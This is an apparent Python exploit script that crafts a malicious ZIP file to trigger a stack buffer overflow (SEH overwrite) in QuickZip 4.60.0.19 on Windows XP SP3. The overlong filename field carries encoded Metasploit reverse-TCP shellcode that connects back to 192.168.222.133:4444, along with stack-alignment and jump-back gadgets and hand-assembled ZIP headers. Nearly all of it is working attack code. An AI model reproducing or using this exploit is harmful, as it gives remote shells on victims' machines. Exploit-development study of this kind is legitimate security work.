quickzip_seh_osdll.py

# Exploit Title: QuickZip 4.60.0.19 SEH Overwrite Exploit using POPPOPRET from OS dll (Tested on Windows XP SP3)
# Based on https://www.offensive-security.com/vulndev/quickzip-stack-bof-a-box-of-chocolates-part-2/
# Date: 06/18/2018

import os, struct

# msfpayload windows/shell_reverse_tcp LHOST=192.168.222.133 LPORT=4444 R | msfencode -e x86/alpha_mixed BufferRegister=ECX -t raw
shellcode = "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlJHNi7pS0uPE0nikUdqyB3TNkrr6PNksbDLLKQBuDlKsBuxTOH73zTfTqKO6QyPll5lsQCL5RFLa0YQJo6mEQYWhbjPaBCgNkSbVpNkqRwLc1xPlKqPsHouKpSD3zUQjprplKG8vxlKqHQ0eQICm3wLw9lK7Dnkc1iFea9oFQyPLl9QJo4MuQyWEhipaeYd4C1mXxgKam4dQeIrF8LKV8gTVaICe6lKdLRklKV8eLUQyCNk6dLKUQxPLIStQ4Q4Sk1K0aF9Sj2qkOypv8co3jLKDR8kk61M587CWBs0UPSXcGD3TrQOCdPhPLSG7VS7iokeLxZ0UQ7ps0diHDF40PqxVIK0BK30YoKe0PBp0PPPG0F0W060e8yz4OKoM0KOn5niIW2HyPlhYNourHwrc0B1CllIHfazTPV6SgqxnyleRT51kO9Eph3SPmQtuPNiM3Rw0Wv7uaifbJgbaIbvm2YmbF8GPDQ4gL5QGqnm3ttdvpHFs0pDbtbp1FRv3fg6QF0NbvV6ScaF2HaizlEolF9oJuK9ypBnaFRfYoFPBHs8ngWmQpiohUMkxpH5NBpVPhi6NuoMMMIoHUwLC61l7zopKK9pbU7uOK3wUC42bO0jePPSKOn5AA"

stack_align = "\x59\x59\x59\x51\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
ecx_align = zero_eax + "\x2D\x5F\x25\x25\x25\x2D\x5F\x25\x25\x25\x2D\x61\x24\x25\x25\x50"
ecx_align += zero_eax + "\x2D\x29\x6A\x31\x55\x2D\x29\x6A\x31\x55\x2D\x2B\x6A\x30\x56\x50"
jmp_back = "\x72\xf1"
filename = "B" * 294 + "BBBB\x65\x47\x7e\x6d" + stack_align + ecx_align + jmp_back + "D" * (100 - len(stack_align) - len(ecx_align) - len(jmp_back)) + shellcode + "E" * (5000 - 294 - 8 - 100 - len(shellcode))

# =======================================================================================================

lfheader = "\x50\x4b\x03\x04" 		# local file header signature
lfheader += "\x14\x00"			# version needed to extract
lfheader += "\x00\x00"			# general purpose bit flag
lfheader += "\x00\x00"			# compression method
lfheader += "\xb7\xac"			# file last modtime
lfheader += "\xce\x34"			# file last moddate
lfheader += "\x00\x00\x00\x00"		# crc32
lfheader += "\x00\x00\x00\x00"		# compressed size
lfheader += "\x00\x00\x00\x00"		# uncompressed size
lfheader += struct.pack('<h', int(len(filename)))  # file name length
lfheader += "\x00\x00" 			# extra field length

cdfheader = "\x50\x4B\x01\x02"		# central directory file header signature 
cdfheader += "\x14\x00"			# version made by
cdfheader += "\x14\x00"			# vesion need to extract
cdfheader += "\x00\x00"			# general purpose bit flag
cdfheader += "\x00\x00"			# compression method
cdfheader += "\xB7\xAC"			# file last modtime
cdfheader += "\xCE\x34"			# file last moddate
cdfheader += "\x00\x00\x00\x00"		# crc32
cdfheader += "\x00\x00\x00\x00"		# compressed size
cdfheader += "\x00\x00\x00\x00"		# uncompressed size
cdfheader += struct.pack('<h', int(len(filename)))  # file name length
cdfheader += "\x00\x00"			# extra field length
cdfheader += "\x00\x00"			# file comment length
cdfheader += "\x00\x00"			# disk number where file starts
cdfheader += "\x01\x00"			# internal file attributes
cdfheader += "\x24\x00\x00\x00"		# external file attributes
cdfheader += "\x00\x00\x00\x00"		# relatvie offset of local file header

eocd = "\x50\x4B\x05\x06"		# end of central directory signature
eocd += "\x00\x00"			# number of this disk
eocd += "\x00\x00"			# disk where central directory starts
eocd += "\x01\x00"			# number of central directory records on this disk
eocd += "\x01\x00"			# total number of central directory records
eocd += struct.pack('<L', int(len(cdfheader + filename)))		# size of central directory (bytes)
eocd += struct.pack('<L', int(len(lfheader + filename))) 	# offset of start of central directory, relative to start of archive
eocd += "\x00\x00"			# comment length

# =======================================================================================================

print "Size = " + str(len(filename))
print "lfheader_length = " + str(len(lfheader))
print "cdfheader_length = " + str(len(cdfheader))
print "eocd_length = " + str(len(eocd))

os.system("del tiptiptipboom.zip")

buf = lfheader + filename + cdfheader + filename + eocd

fh = open("tiptiptipboom.zip", "w")
fh.write(buf)
fh.close()

raw_input('Press Enter to exit')